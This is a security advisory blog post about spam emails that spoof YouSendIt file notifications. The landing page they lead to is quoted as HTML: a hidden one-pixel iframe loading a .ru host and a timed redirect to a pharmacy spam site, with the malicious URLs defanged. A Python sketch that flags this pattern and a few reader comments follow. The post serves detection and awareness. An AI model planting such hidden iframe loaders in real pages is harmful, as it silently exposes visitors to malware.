YouSendIt abused in malware and spam distribution
August 5, 2010
MX Lab intercepted emails with the subject “You have received a file from aleppotz@rockypointinc.com via YouSendIt.” that carry a potential risk of a malicious payload and redirect you to a Canadian Pharmacy web site. The email address in the subject line can differ depending on the spoofed sender's address.

The message indicates that a file, in this case an audio file in MP4 format, is waiting for you to download at YouSendIt, the well-known online file sharing and distribution web site.
The URLs in the message, however, do not point to the YouSendIt web site but lead to hxxp://carlaustiniii.org/x.html. When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
    PLEASE WAITING 4 SECOND...
    <meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com">
    </head><body>
    <iframe src="hxxp://tartonion.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
    </body></html>
We believe at this stage that these messages have a malicious payload that could infect your computer. Afterwards we got redirected to hxxp://spruceteam.com/, the famous Canadian Pharmacy web site.
MX Lab has detected an increase in combined strategies during the last few weeks and months, where emails lead to a web site with malicious code and exploits and then forward the user to a spam web site in the hope that the end user will not notice that his computer is also infected with a trojan.
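The combination described above (a hidden iframe that loads a third-party host, followed by a timed meta refresh to another site) can be flagged by static inspection of a landing page. The following Python sketch is an added example, not MX Lab's code; the names `LandingPageScanner`, `host_of` and `scan` are hypothetical, and the sample input is the HTML quoted in this post with its URLs left defanged.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Landing page as quoted in the post (URLs kept defanged as hxxp://).
SAMPLE = '''PLEASE WAITING 4 SECOND...
<meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com">
</head><body>
<iframe src="hxxp://tartonion.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>'''
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def host_of(url):
    # Accept defanged hxxp:// URLs so published reports can be scanned as-is.
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.I)
    return (urlsplit(url).hostname or "").lower()

class LandingPageScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.refresh = []         # (delay_seconds, target_host)
        self.hidden_iframes = []  # hosts loaded by invisible iframes

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.match(r"\s*(\d+)\s*[;,]\s*url\s*=\s*['\"]?([^'\"]+)",
                         a.get("content", ""), re.I)
            if m:
                self.refresh.append((int(m.group(1)), host_of(m.group(2))))
        elif tag == "iframe" and a.get("src"):
            tiny = (a.get("width", "").strip() in ("0", "1")
                    and a.get("height", "").strip() in ("0", "1"))
            if tiny or HIDDEN_CSS.search(a.get("style", "")):
                self.hidden_iframes.append(host_of(a["src"]))

def scan(html, page_host):
    """Return (findings, combined); combined is True when the page has both
    an off-site hidden iframe and an off-site meta refresh."""
    p = LandingPageScanner()
    p.feed(html)
    p.close()
    # An empty host means a relative URL, which stays on the same site.
    iframes = [("hidden-iframe", h) for h in p.hidden_iframes
               if h and h != page_host]
    refreshes = [("meta-refresh", h, d) for d, h in p.refresh
                 if h and h != page_host]
    return iframes + refreshes, bool(iframes and refreshes)
```

Either finding alone occurs on legitimate pages, so the `combined` flag is the stronger signal for mail-filter or proxy triage.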

I have been receiving several of these a day. I obviously delete them, but man, they're ruthless! Mine contain a zip file versus mp file…
I’ve been swamped with these for the past two days. What a bad intro to YouSendIt, which looks like a very good service.